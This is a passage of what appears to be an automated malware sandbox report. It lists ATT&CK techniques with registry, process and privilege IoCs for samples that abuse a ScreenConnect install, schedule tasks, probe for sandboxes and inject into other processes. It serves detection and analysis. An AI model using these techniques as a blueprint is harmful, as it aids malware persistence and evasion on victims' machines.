
T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	333.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	windows.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	T.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New Text Document mod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DBDownloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	system.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rea.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSystem32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jij.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Surrey.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77-Bitdefender.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zoom_invitecode=23884232.zoom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Enalib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ApiUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	36.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DBDownloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ApiUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	test.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	noyjhoadw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	access.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BQEHIQAG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 24 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2644	PING.EXE
6652	PING.EXE
5508	PING.EXE
5444	PING.EXE
1100	PING.EXE
3080	PING.EXE
956	PING.EXE
5784	PING.EXE
2256	PING.EXE
2396	PING.EXE
3684	PING.EXE
6104	PING.EXE
5536	PING.EXE
3000	PING.EXE
6624	PING.EXE
6548	PING.EXE
6616	PING.EXE
3776	PING.EXE
3256	PING.EXE
4796	PING.EXE
6740	PING.EXE
3728	PING.EXE
2924	PING.EXE
4852	PING.EXE

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000097e32746e391c5270000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000097e327460000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090097e32746000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d97e32746000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000097e3274600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1568	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe

Modifies registry class 40 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\PackageCode = "86943F5896C1004C9089522E56EA9E4E"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\URL Protocol	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductName = "ScreenConnect Client (0cef7d10d8f459fc)"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	ApiUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E\Full	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Version = "402849799"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF\86943F5896C1004C9089522E56EA9E4E	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	New Text Document mod.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\ = "ScreenConnect Client (0cef7d10d8f459fc) Credential Provider"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductIcon = "C:\\Windows\\Installer\\{85F34968-1C69-C400-0998-25E265AEE9E4}\\DefaultIcon"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc	msiexec.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

pid	Process
1268	reg.exe
1676	reg.exe
952	reg.exe
3852	reg.exe
6212	reg.exe

Runs ping.exe 1 TTPs 24 IoCs

Remote System Discovery

T1018

pid	Process
3684	PING.EXE
5536	PING.EXE
5508	PING.EXE
5444	PING.EXE
2256	PING.EXE
4796	PING.EXE
3000	PING.EXE
6104	PING.EXE
2924	PING.EXE
3256	PING.EXE
956	PING.EXE
5784	PING.EXE
1100	PING.EXE
3728	PING.EXE
3080	PING.EXE
6548	PING.EXE
6616	PING.EXE
6624	PING.EXE
6652	PING.EXE
3776	PING.EXE
4852	PING.EXE
2396	PING.EXE
2644	PING.EXE
6740	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 40 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1452	schtasks.exe
7076	schtasks.exe
6048	schtasks.exe
4020	schtasks.exe
4600	schtasks.exe
4408	schtasks.exe
2460	schtasks.exe
5344	schtasks.exe
5444	schtasks.exe
5716	schtasks.exe
6716	schtasks.exe
6016	schtasks.exe
5352	schtasks.exe
3484	schtasks.exe
5168	schtasks.exe
2816	schtasks.exe
3440	schtasks.exe
3084	schtasks.exe
6408	schtasks.exe
860	schtasks.exe
4660	schtasks.exe
2508	schtasks.exe
5340	schtasks.exe
6096	schtasks.exe
5744	schtasks.exe
4188	schtasks.exe
5308	schtasks.exe
5760	schtasks.exe
5496	schtasks.exe
5240	schtasks.exe
4624	schtasks.exe
5836	schtasks.exe
1932	schtasks.exe
5716	schtasks.exe
240	schtasks.exe
5860	schtasks.exe
5672	schtasks.exe
1456	schtasks.exe
5620	schtasks.exe
5756	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2144	EXCEL.EXE
2144	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
3560	Update.exe
3560	Update.exe
3560	Update.exe
3560	Update.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
4740	windows.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
2116	Enalib.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
4540	T.exe
3896	Powershell.exe
3896	Powershell.exe

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

pid	Process
1104	server.exe
2404	MSystem32.exe
5500	server.exe
1104	server.exe
2404	MSystem32.exe
5500	server.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
2620	$77-Bitdefender.exe
4612	ApiUpdater.exe
2620	rea.exe
2988	DBDownloader.exe
2620	$77-Bitdefender.exe
4612	ApiUpdater.exe
2620	rea.exe
2988	DBDownloader.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3836	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	2416	._cache_Synaptics.exe
Token: SeDebugPrivilege	3560	Update.exe
Token: SeDebugPrivilege	860	tasklist.exe
Token: SeDebugPrivilege	3848	tasklist.exe
Token: SeDebugPrivilege	4340	zoom_invitecode=23884232.zoom.exe
Token: SeShutdownPrivilege	2508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2508	msiexec.exe
Token: SeSecurityPrivilege	1908	msiexec.exe
Token: SeCreateTokenPrivilege	2508	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2508	msiexec.exe
Token: SeLockMemoryPrivilege	2508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2508	msiexec.exe
Token: SeMachineAccountPrivilege	2508	msiexec.exe
Token: SeTcbPrivilege	2508	msiexec.exe
Token: SeSecurityPrivilege	2508	msiexec.exe
Token: SeTakeOwnershipPrivilege	2508	msiexec.exe
Token: SeLoadDriverPrivilege	2508	msiexec.exe
Token: SeSystemProfilePrivilege	2508	msiexec.exe
Token: SeSystemtimePrivilege	2508	msiexec.exe
Token: SeProfSingleProcessPrivilege	2508	msiexec.exe
Token: SeIncBasePriorityPrivilege	2508	msiexec.exe
Token: SeCreatePagefilePrivilege	2508	msiexec.exe
Token: SeCreatePermanentPrivilege	2508	msiexec.exe
Token: SeBackupPrivilege	2508	msiexec.exe
Token: SeRestorePrivilege	2508	msiexec.exe
Token: SeShutdownPrivilege	2508	msiexec.exe
Token: SeDebugPrivilege	2508	msiexec.exe
Token: SeAuditPrivilege	2508	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2508	msiexec.exe
Token: SeChangeNotifyPrivilege	2508	msiexec.exe
Token: SeRemoteShutdownPrivilege	2508	msiexec.exe
Token: SeUndockPrivilege	2508	msiexec.exe
Token: SeSyncAgentPrivilege	2508	msiexec.exe
Token: SeEnableDelegationPrivilege	2508	msiexec.exe
Token: SeManageVolumePrivilege	2508	msiexec.exe
Token: SeImpersonatePrivilege	2508	msiexec.exe
Token: SeCreateGlobalPrivilege	2508	msiexec.exe
Token: SeCreateTokenPrivilege	2508	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2508	msiexec.exe
Token: SeLockMemoryPrivilege	2508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2508	msiexec.exe
Token: SeMachineAccountPrivilege	2508	msiexec.exe
Token: SeTcbPrivilege	2508	msiexec.exe
Token: SeSecurityPrivilege	2508	msiexec.exe
Token: SeTakeOwnershipPrivilege	2508	msiexec.exe
Token: SeLoadDriverPrivilege	2508	msiexec.exe
Token: SeSystemProfilePrivilege	2508	msiexec.exe
Token: SeSystemtimePrivilege	2508	msiexec.exe
Token: SeProfSingleProcessPrivilege	2508	msiexec.exe
Token: SeIncBasePriorityPrivilege	2508	msiexec.exe
Token: SeCreatePagefilePrivilege	2508	msiexec.exe
Token: SeCreatePermanentPrivilege	2508	msiexec.exe
Token: SeBackupPrivilege	2508	msiexec.exe
Token: SeRestorePrivilege	2508	msiexec.exe
Token: SeShutdownPrivilege	2508	msiexec.exe
Token: SeDebugPrivilege	2508	msiexec.exe
Token: SeAuditPrivilege	2508	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2508	msiexec.exe
Token: SeChangeNotifyPrivilege	2508	msiexec.exe
Token: SeRemoteShutdownPrivilege	2508	msiexec.exe
Token: SeUndockPrivilege	2508	msiexec.exe
Token: SeSyncAgentPrivilege	2508	msiexec.exe
Token: SeEnableDelegationPrivilege	2508	msiexec.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
2508	msiexec.exe
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
2508	msiexec.exe
2508	msiexec.exe
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
2508	msiexec.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com
1556	Surrey.com

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
2144	EXCEL.EXE
2144	EXCEL.EXE
2144	EXCEL.EXE
2144	EXCEL.EXE
1140	22.exe
1916	msinfo32.exe
3916	Network.exe
5512	msinfo32.exe
1784	Windows Shell Interactive.exe
2144	EXCEL.EXE
2144	EXCEL.EXE
2144	EXCEL.EXE
2144	EXCEL.EXE
1140	22.exe
1916	msinfo32.exe
3916	Network.exe
5512	msinfo32.exe
1784	Windows Shell Interactive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 892 wrote to memory of 3836	892	New Text Document mod.exe	77
PID 892 wrote to memory of 3836	892	New Text Document mod.exe	77
PID 892 wrote to memory of 3476	892	New Text Document mod.exe	79
PID 892 wrote to memory of 3476	892	New Text Document mod.exe	79
PID 892 wrote to memory of 3476	892	New Text Document mod.exe	79
PID 3476 wrote to memory of 2416	3476	Synaptics.exe	80
PID 3476 wrote to memory of 2416	3476	Synaptics.exe	80
PID 3836 wrote to memory of 3320	3836	._cache_New Text Document mod.exe	82
PID 3836 wrote to memory of 3320	3836	._cache_New Text Document mod.exe	82
PID 3836 wrote to memory of 3320	3836	._cache_New Text Document mod.exe	82
PID 2416 wrote to memory of 3560	2416	._cache_Synaptics.exe	83
PID 2416 wrote to memory of 3560	2416	._cache_Synaptics.exe	83
PID 2416 wrote to memory of 3560	2416	._cache_Synaptics.exe	83
PID 3320 wrote to memory of 4576	3320	1.exe	84
PID 3320 wrote to memory of 4576	3320	1.exe	84
PID 3320 wrote to memory of 4576	3320	1.exe	84
PID 3836 wrote to memory of 948	3836	._cache_New Text Document mod.exe	86
PID 3836 wrote to memory of 948	3836	._cache_New Text Document mod.exe	86
PID 3836 wrote to memory of 948	3836	._cache_New Text Document mod.exe	86
PID 4576 wrote to memory of 860	4576	cmd.exe	87
PID 4576 wrote to memory of 860	4576	cmd.exe	87
PID 4576 wrote to memory of 860	4576	cmd.exe	87
PID 4576 wrote to memory of 4644	4576	cmd.exe	88
PID 4576 wrote to memory of 4644	4576	cmd.exe	88
PID 4576 wrote to memory of 4644	4576	cmd.exe	88
PID 4576 wrote to memory of 3848	4576	cmd.exe	90
PID 4576 wrote to memory of 3848	4576	cmd.exe	90
PID 4576 wrote to memory of 3848	4576	cmd.exe	90
PID 4576 wrote to memory of 2492	4576	cmd.exe	91
PID 4576 wrote to memory of 2492	4576	cmd.exe	91
PID 4576 wrote to memory of 2492	4576	cmd.exe	91
